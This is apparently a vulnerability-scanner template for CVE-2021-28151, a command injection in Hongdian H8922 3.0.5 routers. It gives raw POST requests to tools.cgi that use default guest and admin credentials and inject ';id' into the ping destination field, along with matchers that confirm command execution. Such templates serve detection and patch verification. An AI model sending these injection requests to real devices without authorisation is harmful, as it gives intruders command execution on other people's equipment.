2021-07-10 12:16:35 +00:00
id : CVE-2021-28151
info :
2022-07-26 13:45:11 +00:00
name : Hongdian H8922 3.0.5 - Remote Command Injection
2021-07-10 12:16:35 +00:00
author : gy741
severity : high
description : |
2023-03-27 17:46:47 +00:00
Hongdian H8922 3.0.5 devices are susceptible to remote command injection via shell metacharacters into the ip-address (a/k/a Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system.
2021-08-18 11:37:49 +00:00
reference :
2021-07-10 13:15:09 +00:00
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
2022-05-17 09:18:12 +00:00
- http://en.hongdian.com/Products/Details/H8922
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-28151
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-28151
cwe-id : CWE-78
2023-04-12 10:55:48 +00:00
epss-score : 0.96982
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,hongdian,rce,injection
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2021-07-10 12:16:35 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-10 12:16:35 +00:00
- raw :
- |
POST /tools.cgi HTTP/1.1
Host : {{Hostname}}
Authorization : Basic Z3Vlc3Q6Z3Vlc3Q=
Origin : {{BaseURL}}
2021-09-08 12:17:19 +00:00
Referer : {{BaseURL}}/tools.cgi
2021-07-10 12:16:35 +00:00
op_type=ping&destination=%3Bid
- |
POST /tools.cgi HTTP/1.1
Host : {{Hostname}}
Authorization : Basic YWRtaW46YWRtaW4=
Origin : {{BaseURL}}
2021-09-08 12:17:19 +00:00
Referer : {{BaseURL}}/tools.cgi
2021-07-10 12:16:35 +00:00
op_type=ping&destination=%3Bid
matchers-condition : and
matchers :
2023-01-02 09:33:06 +00:00
- type : regex
regex :
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
2021-07-10 12:16:35 +00:00
- type : word
part : header
words :
2023-01-02 09:33:06 +00:00
- "text/html"
- "application/x-www-form-urlencoded"
condition : or
2022-07-26 13:45:11 +00:00
2023-01-02 09:33:06 +00:00
- type : status
status :
- 200